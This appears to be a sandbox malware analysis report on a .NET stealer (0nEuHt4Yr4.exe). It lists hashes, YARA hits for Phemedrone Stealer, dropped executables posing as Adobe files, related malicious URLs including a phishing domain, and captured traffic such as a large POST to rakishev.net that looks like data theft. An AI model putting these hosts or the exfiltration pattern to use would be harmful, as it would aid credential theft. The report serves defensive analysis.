	PJsi59OXeF.elf	Get hash	malicious	Mirai	Browse	18.238.106.118
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	44.235.85.225
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	44.235.85.225
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	54.245.81.65
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	54.245.81.65
AMAZON-02US	https://www.businesstomark.com/google-sheets-vs-excel-a-comprehensive-face-off/	Get hash	malicious	Unknown	Browse	13.225.141.129
	arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	34.249.145.219
	ZotFfekdO4.elf	Get hash	malicious	Mirai, Moobot	Browse	18.158.2.19
	S90RWjAiHN.elf	Get hash	malicious	Mirai, Moobot	Browse	52.213.192.158
	155nvIYN8w.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	https://mak.therewardsqueen.com/?ts=AAB9523C	Get hash	malicious	Unknown	Browse	52.219.193.104
	https://societegenrale-actualisation-secure.com/clients	Get hash	malicious	Unknown	Browse	216.137.39.65
	http://streaklinks.com/Brxjg9dLCzM14sYlGwt8OQSo/https://tracking.vocus.io/link?id=4da69142-f92b-4bbd-8392-f4b4315ea8bd#SmZpc2hlckBjaHMtYWRwaGlsYS5vcmc=&4bbd-8392	Get hash	malicious	Unknown	Browse	18.154.144.76
	JvK18aJqc4.elf	Get hash	malicious	Mirai	Browse	18.149.163.205
	SxTzfYVqdV.elf	Get hash	malicious	Mirai	Browse	18.253.60.86
	DKKfMJFBmm.elf	Get hash	malicious	Mirai	Browse	54.247.62.1
	lV7BC57Wh9.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	http://www.baidu.com/link?url=UoOQDYLwlqkXmaXOTPH-yzlABydiidFYSYneujIBjalSn36BarPC6DuCgIN34REP#accounting@petparadise.com	Get hash	malicious	Unknown	Browse	3.163.85.73
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	54.245.81.65
	PJsi59OXeF.elf	Get hash	malicious	Mirai	Browse	18.238.106.118
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	44.235.85.225
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	44.235.85.225
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	54.245.81.65
	http://zx.paymentsmusic.com	Get hash	malicious	Unknown	Browse	54.245.81.65

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	file.exe	Get hash	malicious	Stealc, Vidar, onlyLogger	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	Stealc, Vidar, onlyLogger	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	Setup_win64_2.49.0.4_release.exe	Get hash	malicious	LummaC Stealer	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	Setup_win64_2.49.0.4_release.exe	Get hash	malicious	LummaC Stealer	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	4JVJJZlplA.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	yivaQLZs6n.exe	Get hash	malicious	Raccoon Stealer v2	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	Stealc, Vidar, onlyLogger	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	Stealc, Vidar, onlyLogger	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	SWT-amount_of_58,483..docx.doc	Get hash	malicious	Unknown	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	qlbLQahAiQ.exe	Get hash	malicious	onlyLogger	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	Proof_hotel_2023.pdf.exe	Get hash	malicious	RedLine	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	SecuriteInfo.com.Win32.BotX-gen.12911.31840.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
	1Zz2Et7Wlz.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.215.32.195 52.37.31.54 18.154.132.164 54.200.76.247 13.226.224.37
3b5074b1b5d032e5620f69f9f700ff0e	HTML.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	99.84.203.85 63.140.36.121
	uqVcU5DZFV.exe	Get hash	malicious	Xmrig	Browse	99.84.203.85 63.140.36.121
	rOrdendecompra4583879___________pdf.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	rOrdendecompra4583879___________pdf.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	file.exe	Get hash	malicious	RedLine	Browse	99.84.203.85 63.140.36.121
	efzDcBWldp.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	efzDcBWldp.exe	Get hash	malicious	Phemedrone Stealer	Browse	99.84.203.85 63.140.36.121
	Shipping_Documents.exe	Get hash	malicious	AgentTesla	Browse	99.84.203.85 63.140.36.121
	MIB_PTE_30-09-23.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	INV_NO_62228655.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	MIB_PTE_30-09-23.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	Purchase_order.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	INV_NO_62228655.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	Purchase_order.exe	Get hash	malicious	Unknown	Browse	99.84.203.85 63.140.36.121
	SecuriteInfo.com.Trojan.DownLoaderNET.447.2279.24952.exe	Get hash	malicious	AgentTesla	Browse	99.84.203.85 63.140.36.121
	SecuriteInfo.com.Win32.RansomX-gen.23647.22068.exe	Get hash	malicious	AgentTesla	Browse	99.84.203.85 63.140.36.121
	ca.exe	Get hash	malicious	Keyzetsu Clipper	Browse	99.84.203.85 63.140.36.121
	cf.exe	Get hash	malicious	DCRat	Browse	99.84.203.85 63.140.36.121
	Zamowienie_nr_0410236533.exe	Get hash	malicious	AgentTesla	Browse	99.84.203.85 63.140.36.121
	f4.exe	Get hash	malicious	AgentTesla	Browse	99.84.203.85 63.140.36.121
37f463bf4616ecd445d4a1937da06e19	Sammich-Premium-Rename-Me.exe	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	Sammich-Premium-Rename-Me.exe	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	Tenors.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.160.107.34 18.164.166.37
	SWT-amount_of_58,483..docx.doc	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	Wallpaper.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	35.160.107.34 18.164.166.37
	Zip_Notificaciones_03102023_ZEtlXbZzEUWNVw.HTA.hta	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	Zip_Factura_Digital_QR2Q7HvJiU2.HTA.hta	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	YP61700IK.exe	Get hash	malicious	GuLoader	Browse	35.160.107.34 18.164.166.37
	E-dekont.exe	Get hash	malicious	GuLoader	Browse	35.160.107.34 18.164.166.37
	E-dekont.exe	Get hash	malicious	GuLoader	Browse	35.160.107.34 18.164.166.37
	Purchase_Order_24567865.vbs	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	PO_288209_Pdf.vbs	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	POLY_V-BELT_Gufero_20231003.vbe	Get hash	malicious	GuLoader	Browse	35.160.107.34 18.164.166.37
	Misteaching.vbe	Get hash	malicious	Unknown	Browse	35.160.107.34 18.164.166.37
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	35.160.107.34 18.164.166.37
	Vikariere.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.160.107.34 18.164.166.37
	DOC2045.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.160.107.34 18.164.166.37
	Athirst.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.160.107.34 18.164.166.37
	Filippic.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.160.107.34 18.164.166.37
	Thetempest.exe	Get hash	malicious	FormBook, GuLoader	Browse	35.160.107.34 18.164.166.37

Process:	C:\Users\user\Desktop\0nEuHt4Yr4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	5.7659898421601286
Encrypted:	false
SSDEEP:	1536:YNHNY8knGTS8Yd/exySO5T3rZlSwEKSKO9Tzpmp:YNHNYfnrZdmxa5TbZYwEKSKO9TVk
MD5:	E025C7BFA143C476A648E9DAA3CFDA2F
SHA1:	D4F90AE2727CD20C19802EEEE5589FC4E7B36EC3
SHA-256:	95DDB8A73BA1D02C13735FE21F335599E0659B3DA7B42E23654650B89D4DDF60
SHA-512:	F9812370E7855ACAA15F70A5EE71FA2B78040BE72553CC4109276429731AB3A10924FD8E08B8FF91E9C3B0DC57C4BC32168C29416E4A401208FD2574DBD9B8F3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: C:\ProgramData\USOShared\2JRUV92E.exe, Author: Joe Security Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\USOShared\2JRUV92E.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\USOShared\2JRUV92E.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.d.........."...0..B...........`... ........@.. ....................................@.................................h`..S.................................................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B.................`......H...........t...........................................................PK......................................PK......PK......PK......PK....{......{....V.(......}......}..... 6.j. )UU.Z(.....{....o!...X )UU.Z(.....{....o"...X..{%.....{&...V.(......}%.....}&.... .V0; )UU.Z(.....{%...o!...X )UU.Z(.....{&...o"...X..{'.....{(...V.(......}'.....}(.... .1.. )UU.Z(.....{'...o!...X )UU.Z(.....{(...o"...X..(.....s...........o+.....(...+J...-...s3...s4.....o5.....o6

Source: unknown	HTTPS traffic detected: 34.215.32.195:443 -> 192.168.2.3:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.215.32.195:443 -> 192.168.2.3:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.37.31.54:443 -> 192.168.2.3:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.226.224.37:443 -> 192.168.2.3:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.37.31.54:443 -> 192.168.2.3:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.154.132.164:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.215.32.195:443 -> 192.168.2.3:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.154.132.164:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.154.132.164:443 -> 192.168.2.3:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.154.132.164:443 -> 192.168.2.3:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.215.32.195:443 -> 192.168.2.3:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 99.84.203.85:443 -> 192.168.2.3:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.160.107.34:443 -> 192.168.2.3:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.200.76.247:443 -> 192.168.2.3:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.215.32.195:443 -> 192.168.2.3:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 63.140.36.121:443 -> 192.168.2.3:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 63.140.36.121:443 -> 192.168.2.3:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.164.166.37:443 -> 192.168.2.3:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 63.140.36.121:443 -> 192.168.2.3:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 63.140.36.121:443 -> 192.168.2.3:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 63.140.36.121:443 -> 192.168.2.3:49869 version: TLS 1.2

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /json/?fields=11827 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1Content-Type: multipart/form-data; boundary=----------------------------8dbc509b98be77fHost: rakishev.netContent-Length: 540186Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.88.34 104.21.88.34
Source: Joe Sandbox View	IP Address: 104.21.88.34 104.21.88.34
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Code function: 0_2_00007FF9A3CA0490	0_2_00007FF9A3CA0490
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Code function: 0_2_00007FF9A3CA05B8	0_2_00007FF9A3CA05B8
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Code function: 0_2_00007FF9A3CA04C8	0_2_00007FF9A3CA04C8
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Code function: 0_2_00007FF9A3CA0847	0_2_00007FF9A3CA0847

Source: 0nEuHt4Yr4.exe, 00000000.00000002.894199414.0000000000E99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 0nEuHt4Yr4.exe
Source: 0nEuHt4Yr4.exe, 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdobe Installer@ vs 0nEuHt4Yr4.exe
Source: 0nEuHt4Yr4.exe, 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesystem.exeH vs 0nEuHt4Yr4.exe

Source: unknown	Process created: C:\Users\user\Desktop\0nEuHt4Yr4.exe C:\Users\user\Desktop\0nEuHt4Yr4.exe
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe "C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe"
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process created: C:\ProgramData\USOShared\2JRUV92E.exe "C:\ProgramData\USOShared\2JRUV92E.exe"
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe "C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process created: C:\ProgramData\USOShared\2JRUV92E.exe "C:\ProgramData\USOShared\2JRUV92E.exe"	Jump to behavior

Source: 0nEuHt4Yr4.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll	Jump to behavior

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.9798872217111247
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	0nEuHt4Yr4.exe
File size:	6'999'552 bytes
MD5:	ccec9f6516e38c852b1df13c836e5430
SHA1:	30e3c298370f32e92d42f586e170996229db8fab
SHA256:	e5e92ec5d1d5be22b05694956de0321475105789279acbc9e83d7796026ec385
SHA512:	e23d714a352ebda1c75ade3f782159562d34402ebff31511f5b952b247f9b49c039a4b29123762bbffcbe90f3dd6db828bc36deac344a91d75f41346435bbdd1
SSDEEP:	49152:Fu9q0pxgIYZdVKr2TZO/Ay+tN2ACtcXrGwuh0637dkKg4kGzlXerAEEEEEEEEE20:
TLSH:	1766BB2439FF500DB173EF965FD8B9EADD6FF633260A60AA205103478712D81DD9263A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i>............"...0...j..H......~.j.. ....j...@.. .......................@k.......k...@................................

Source: global traffic	HTTP traffic detected: GET /en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=true HTTP/1.1Accept: /Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: auth.services.adobe.com
Source: global traffic	HTTP traffic detected: GET /57e67ac4b/styles.3f69be8a.css HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/generic/adobe_logo_black.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/canvas/Fotolia_113489662_XL.jpg HTTP/1.1Accept: /Referer: 